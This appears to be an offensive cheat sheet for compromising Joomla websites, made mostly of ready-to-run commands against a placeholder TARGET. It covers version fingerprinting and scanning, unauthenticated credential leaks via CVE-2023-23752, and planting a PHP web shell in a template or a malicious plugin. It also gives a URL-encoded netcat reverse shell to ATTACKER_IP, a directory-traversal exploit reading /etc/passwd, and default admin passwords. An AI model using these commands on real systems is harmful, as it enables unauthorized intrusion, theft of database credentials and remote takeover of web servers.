# Check robots.txt for Joomla paths
curl http://TARGET/robots.txt
# Version in XML
curl -s http://TARGET/administrator/manifests/files/joomla.xml | grep version
# README file
curl -s http://TARGET/README.txt | head
# Login page
/administrator/# Install
apt install joomscan
# Basic scan
joomscan -u http://TARGET
# Enumerate components
joomscan -u http://TARGET -ec# Also works for Joomla
droopescan scan joomla -u http://TARGETAffects: Joomla 4.0.0 - 4.2.7
Leaks usernames and database credentials via REST API without authentication.
# Leak usernames
curl -s "http://TARGET/api/index.php/v1/users?public=true" | jq
# Leak DB password (check all fields)
curl -s "http://TARGET/api/index.php/v1/config/application?public=true" | jqgit clone https://github.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT.git
python3 CVE-2023-23752.py -u http://TARGET- Login to
/administratorwith admin creds - Navigate:
Extensions → Templates → Templates - Select a template (e.g.,
protostar) - Edit
error.phpor another file - Add PHP web shell:
system($_GET['cmd']);- Save and access:
curl http://TARGET/templates/protostar/error.php?cmd=idAlternative to template editing - upload a malicious module.
git clone https://github.com/p0dalirius/Joomla-webshell-plugin
cd Joomla-webshell-plugin
make
# Creates: ./dist/joomla-webshell-plugin-1.1.0.zip- Login to
/administrator - Navigate:
System → Install → Extensions- Or directly:
/administrator/index.php?option=com_installer&view=install
- Or directly:
- Upload the ZIP file
- "Installation of the module was successful"
# Test
curl -X POST 'http://TARGET/modules/mod_webshell/mod_webshell.php' --data "action=exec&cmd=id"
# Reverse shell
curl -X POST 'http://TARGET/modules/mod_webshell/mod_webshell.php' \
--data "action=exec&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f%7Csh%20-i%202%3E%261%7Cnc%20ATTACKER_IP%209001%20%3E/tmp/f"Affects: Joomla 1.5.0 - 3.9.4
Requires: Valid admin credentials
# List directory contents
python2.7 joomla_dir_trav.py --url "http://TARGET/administrator/" --username admin --password admin --dir /
# Read specific file
python2.7 joomla_dir_trav.py --url "http://TARGET/administrator/" --username admin --password admin --dir /etc/passwdPoC: https://www.exploit-db.com/exploits/46710
# Database credentials
/configuration.php
# Contains:
public $user = 'joomla_user';
public $password = 'password123';
public $db = 'joomla_db';| Path | Description |
|---|---|
/administrator/ |
Admin login |
/configuration.php |
Main config (DB creds) |
/templates/ |
Template files |
/plugins/ |
Plugin directory |
/components/ |
Components |
/modules/ |
Modules |
admin:admin
administrator:administrator